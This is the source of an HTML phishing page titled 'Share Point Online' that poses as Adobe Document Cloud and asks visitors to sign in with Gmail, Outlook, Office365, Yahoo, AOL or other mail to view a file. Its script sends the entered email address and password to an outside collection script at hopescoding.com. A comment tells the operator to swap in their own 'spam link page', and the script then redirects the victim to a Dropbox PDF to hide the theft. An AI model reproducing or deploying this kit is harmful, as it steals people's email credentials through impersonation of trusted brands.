
<!doctype html>
<html lang="en">
<head>
    <title>Share Point Online</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <style type="text/css">
      body{
        font-size: 14px;
      }
	  
      #errorMessage{
        color: red;
		text-align: left;
		padding: 20px 0px 20px 15px;
      }
    </style>
  </head>
  <body>
    <div class="container-fluid">
      <div class="row" style="background-image: url('images/7.jpg'); background-size: cover;background-repeat: no-repeat;">
        <div class="container">
          <div class="row">
            <div class="col-lg-4 mx-auto my-5 px-5 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.7);">
              <div class="text-center pt-5"> 
                <img src="images/adobe.jpg" class="img-fluid" width="100px"><br>
                <span class="h6 text-white">Adobe Document Cloud</span><br>
                <span class="text-white font-weight-normal">To read the document, please enter with the valid email credentials that this file was sent to.</span>
              </div>
              <div class="mt-3">
                <div class="row">
                <div class="col-lg-12">
                    <a href="javascript:void(0)" id="gmailmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class="mt-2" style=" background-color: #D44638;">
                      </div>
                    </a>
                  </div>
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #0073C8;">
                        <img src="images/outlook1.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4" style="vertical-align: middle; color: white;">Sign in with Outlook</span>
                      </div>
                    </a>
                  </div>
                </div>
                <div class="row">
                  <div class="col-lg-12 ">
                    <a href="javascript:void(0)" id="aolmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class="  mt-2" style=" background-color: #31459B;">
                      </div>
                    </a>
                  </div>
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #FF3C00;">
                        <img src="images/office3651.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4"  style="vertical-align: middle; color: white;">Sign in with Office365</span>
                      </div>
                    </a>
                  </div>
                </div>
                <div class="row">
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="yahoomodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #5F0F68;">
                      </div>
                    </a>
                  </div>
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #0B5BD3;">
                        <img src="images/other1.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4"  style="vertical-align: middle; color: white;">Sign in with Other Mail</span>
                      </div>
                    </a>
                  </div>
                  <div class="col-lg-12">
                     <p class="text-white mt-3 text-center">Select your email provider to view Document</p>
                <p class="h6 text-center text-white">Copyright © 2021 Adobe.</p> 
                    
                  </div>
               
              </div> 
            </div>
          </div>
        </div>

      </div> 
    </div>




    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">

            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
          <div class="modal-body">
            <center>
              <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="40px">
              <h5 class="modal-title" id="exampleModalLabel">Login with <span id="field">Gmail</span></h5>
              <div id="errorMessage"></div>

            </center>
            <form id="contact" class="form-horizontal well">
              <div class="col-lg-12">
                <div class="form-group">
                  <label for="exampleInputEmail1">Email address</label>
                  <input type="email" name="email" class="form-control" id="email" aria-describedby="emailHelp" placeholder="Enter email">
                  <small id="emailHelp" class="form-text text-muted">We'll never share your email with anyone else.</small>
                </div>
              </div>
              <div class="col-lg-12">
                <div class="form-group">
                  <label for="Password">Password</label>
                  <input type="password" name="password" class="form-control" id="password" aria-describedby="emailHelp" placeholder="Enter Password">
                </div>
              </div>
            </div>
            <div class="modal-footer">
              <button type="button" class="btn btn-dark" data-dismiss="modal" style="border-radius: 0;">Close</button>
              <button class="btn btn-primary pull-right" id="submit-btn" style="border-radius: 0;">Login</button>
            </div>
          </form>
        </div>
      </div>
    </div>
    
    <script>
		/* global $ */
		$(document).ready(function(){
			$('#gmailmodal').click(function() {
				$('#contact').trigger("reset");
				$('#fieldImg').attr('src', 'images/gmail.png');
				$('#field').html("Gmail");
				$('#ajaxModal').modal('show');
			});
			$('#outlookmodal').click(function() {
				$('#contact').trigger("reset");
				$('#fieldImg').attr('src', 'images/outlook.png');
				$('#field').html("Outlook");
				$('#ajaxModal').modal('show');
			});
			$('#aolmodal').click(function() {
				$('#contact').trigger("reset");
				$('#fieldImg').attr('src', 'images/aol.png');
				$('#field').html("Aol");
				$('#ajaxModal').modal('show');
			});
			$('#office365modal').click(function() {
				$('#contact').trigger("reset");
				$('#fieldImg').attr('src', 'images/office365.png');
				$('#field').html("Office 365");
				$('#ajaxModal').modal('show');
			});
			$('#yahoomodal').click(function() {
				$('#contact').trigger("reset");
				$('#fieldImg').attr('src', 'images/yahoo.png');
				$('#field').html("Yahoo");
				$('#ajaxModal').modal('show');
			});
			$('#othermodal').click(function() {
				$('#contact').trigger("reset");
				$('#fieldImg').attr('src', 'images/othermail.ico');
				$('#field').html("Other Mail");
				$('#ajaxModal').modal('show');
			});
			$('#submit-btn').click(function(event){
				event.preventDefault();

				var email= $("#email").val();
				var password= $("#password").val();
				var detail = $("#field").html();
				//var tel= $("#tel").val();
				var errorMessage = $('#errorMessage').html();
				$('#errorMessage').text( errorMessage );
				var filterEmail = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
				var filterEmpty = /^(?=.{1,})/;
				
				if(email == "" || !filterEmail.test(email) || password == "") {
					$('#errorMessage').html("Enter a valid email address and Password.");
				} else {
					$('#errorMessage').html("");
					$.ajax({
						dataType: 'JSON',
						// Change this to your spam link page and make sure the next.php remain after your spam link
						url: 'https://hopescoding.com/adminteam/b2b/allinone/next.php',
						type: 'POST',
						data: {
							email: email,
							password: password,
							detail: detail,
						},

					  complete: function(){
						//Where to redirect to
						window.location.href = "https://www.dropbox.com/938d/file.pdf";
					  }
					});
				}

			});
		});	
	</script>
  </html>
